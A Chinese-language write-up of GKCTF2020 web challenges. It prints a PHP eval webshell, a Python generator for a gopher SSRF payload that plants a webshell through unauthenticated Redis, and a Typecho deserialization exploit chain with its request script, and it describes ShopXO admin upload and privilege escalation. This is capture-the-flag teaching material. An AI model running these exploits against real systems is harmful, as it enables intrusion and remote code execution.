GKCTF2020 WEB wp

[GKCTF2020]CheckIN—-bypass disable_functions

打开环境，审计代码

代码功能是需要传入Ginkgo参数，其值需要经过base64编码，后端再解码通过eval函数执行

这里直接构造一句话上传编码后的参数

eval($_POST[123]);—->ZXZhbCgkX1BPU1RbMTIzXSk7

直接通过连接中国蚁剑进入主目录查看flag

但是并没有可读权限

但是会发现一个readflag文件

ELF可执行文件，应该是读取flag的文件，现在就是需要执行它
但是这里并不能执行并且禁用了大多函数

需要bypass disable_functions执行/readflag，

网上有利用脚本，直接修改脚本的命令上传到强大的tmp目录下

通过文件包含使php执行

include('/tmp/exploit')base64编码之后传参即回显flag

[GKCTF2020]老八小超市儿—-shopxo后台上传

打开环境是基于ShopXO的电商系统，网上搜一下很容易找到默认后台

默认密码为shopxo

登录成功后找到上传点如下：

在上面下载默认主体然后在以下文件夹上传一句话，直接写入文件夹，因为等下也是要上传zip文件的

访问https://9db2649b-284a-458e-9aa1-0ea003101c66.node3.buuoj.cn//public/static/index/default/3.php并没有报错说明现在可以用蚁剑连接了

但是此时并不能直接拿到flag

提示在根目录下但是/root无权访问说明肯定是要提权了

看一下auto.sh

发现有python脚本在/var/mail/makeflaghint.py

而且发现flag.hint文件中的内容是有这里控制的应该有着root权限直接加一个读取flag的脚本

这里明显提示我们可以执行命令

稍等片刻flag就get了

[GKCTF2020]cve版签到—-CVE-2020-7066%00截断

–根据提示找到cve，我开始找错了居然找成了server的cve,叫什么Nginx/OpenResty内存泄漏/目录穿越漏洞

开始没用头绪的时候抓包发现hint说是要本地然后结合CVE%00截断

然后又会提示必须以123结尾，那就123结尾嘛

欧克 get!!!

[GKCTF2020]EZ三剑客-EzWeb—-SSRF和redis5.X未授权漏洞

redis未授权漏洞复现

点击跳转redis4.X/5.X漏洞复现
访问环境有提示访问?secret

暴出ip，然后写个脚本做个内网探测看同网段是否有回显不同的，然后返回以下六个

分别看了下发现173.170.206.11有回显提示

说明需要找到可突破的端口

跟着那个简单的脚本添加一个常用端口号然后遍历最后得到6379端口回显不正常

这里就要利用redis的未授权访问通过gopher协议生成exp

from urllib import parse   #设置一系列变量协议、IP、端口、shell命令、文件以及路径、数据库命令以及payload protocol="gopher://" ip="173.107.52.11" port="6379" shell="nn<?php system("cat /flag");?>nn" filename="shell.php" path="/var/www/html" passwd="" cmd=["flushall", "set 1 {}".format(shell.replace(" ","${IFS}")), "config set dir {}".format(path), "config set dbfilename {}".format(filename), "save" ] if passwd:    cmd.insert(0,"AUTH {}".format(passwd)) payload=protocol+ip+":"+port+"/_" #将命令格式化输出 def redis_format(arr):    CRLF="rn"    redis_arr = arr.split(" ")    cmd=""    cmd+="*"+str(len(redis_arr)) for x in redis_arr:       cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")    cmd+=CRLF    return cmd   #编码生成exp if __name__=="__main__": for x in cmd:       payload += parse.quote(redis_format(x)) print(payload) 

然后通过get方式打过去再访问ip/shell.php就能getflag

[GKCTF2020]EZ三剑客-EzNode—-Nodejs内置函数特性

对Nodejs不是很熟，直接用大佬的脚本了

[GKCTF2020]EZ三剑客-EzTypecho—-php反序列化

拿到这个站是typecho的安装界面，直接百度typecho的漏洞就有好嘛—-反序列化

这里是相关代码，base64解码后进行反序列化。
然后漏洞分析这里讲的很清楚 https://www.freebuf.com/vuls/155753.html

反序列化复制给$ config
—-实例化Typecho_db(其文件在html.zip html var Typecho db.php)

—-其中对传入的$ adapterName进行了字符串拼接

—-如果传入的是一个类将会触发__toString方法（把类当作字符串时触发）

—-寻找到Feed这个类中的__toString() 魔术方法，访问了$ item[‘author’]->screenName

—-当$ item[‘author’]->screenName为一个不可访问的属性时，将会触发该类的__get()魔术方法（用于从不可访问数据读取数据）

—-寻找输出点利用__get方法

利用条件：

1、$_GET[‘finish’] 参数不为空
2、Referer 必须是本站

<?php $CMD = 'cat /flag'; class Typecho_Feed { const RSS2 = 'RSS 2.0'; const ATOM1 = 'ATOM 1.0'; private $_type; private $_items; public function __construct() { //$this->_type = $this::RSS2;  $this->_type = $this::ATOM1; $this->_items[0] = array( 'category' => array(new Typecho_Request()), 'author' => new Typecho_Request(), ); } } class Typecho_Request { private $_params = array(); private $_filter = array(); public function __construct() { $this->_params['screenName'] = $GLOBALS[CMD]; $this->_filter[0] = 'assert'; } } $exp = array( 'adapter' => new Typecho_Feed(), 'prefix' => 'typecho_' ); echo base64_encode(serialize($exp)); ?> 

import requests url='https://54393664-a656-4761-8793-d851f6fbd293.node3.buuoj.cn/install.php?finish=1' files={'file':123}   headers={ #__typecho_config为序列化的内容 'cookie':'PHPSESSID=test; __typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6 IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi 4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YToxOntzOjY6ImF1dGhv ciI7TzoxNToiVHlwZWNob19SZXF1ZXN0IjoyOntzOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9wYX JhbXMiO2E6MTp7czoxMDoic2NyZWVuTmFtZSI7czo5OiJjYXQgL2ZsYWciO31zOjI0OiIAVHlw ZWNob19SZXF1ZXN0AF9maWx0ZXIiO2E6MTp7aTowO3M6Njoic3lzdGVtIjt9fX19fXM6NjoicH JlZml4IjtzOjQ6InRlc3QiO30=', 'Referer':'https://54393664-a656-4761-8793-d851f6fbd293.node3.buuoj.cn/install.php' }   re=requests.post(url, files=files, headers=headers, data= {"PHP_SESSION_UPLOAD_PROGRESS": "123456789"}) print(re.text) 

poc构造经过base64编码的内容，然后在cookie里作为__typecho_config的值上传，以及post一个和PHP_SESSION_UOLOAD_PROGRESS的同名变量，返回网页源代码得到flag